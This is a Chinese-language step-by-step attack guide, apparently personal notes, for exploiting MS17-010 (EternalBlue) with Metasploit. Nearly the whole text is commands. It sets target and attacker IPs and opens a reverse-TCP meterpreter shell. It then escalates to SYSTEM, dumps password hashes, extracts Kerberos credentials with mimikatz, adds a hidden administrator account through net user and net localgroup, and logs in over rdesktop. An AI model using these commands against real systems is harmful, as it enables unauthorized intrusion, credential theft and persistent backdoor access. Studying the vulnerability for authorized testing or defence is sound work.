ms17-010提权:

    1. msfconsole //启动msf
    2. search ms17-010 //搜索攻击模块
    3. use exploit/windows/smb/ms17_010_eternalblue //加载模块
    4. //使用show options或者options查看选项设置
    5. //可以使用show targets来查看可以攻击的系统版本
    6. //使用show payloads可以加载所有可以使用的攻击向量
    7. set RHOST 192.168.43.203 //设置目标机IP
    8. set LHOST 192.168.43.49 //设置攻击机IP
    9. set payload windows/x64/meterpreter/reverse_tcp //设置tcp连接
    10. run/exploit //开始攻击
    11. meterpreter> //得到一个反弹meterpreter
    12. meterpreter> Sysinfo //查看系统信息

    1.

    1. meterpreter> Getsystem //提权
    2. meterpreter> getuid //查看权限
    3. meterpreter> hashdump //抓取用户密码
    4. meterpreter> load mimikatz //加载密码提取神器
    5. meterpreter > kerberos

    2.

    1. meterpreter > shell
    2. net user xxxx 1234 /addxxxx用户名1234密码)
    3. net localgroup administrators xxxx /add(将用户设置为管理员权限)

    重新打开一个终端rdesktop+IP
    image.png
    image.png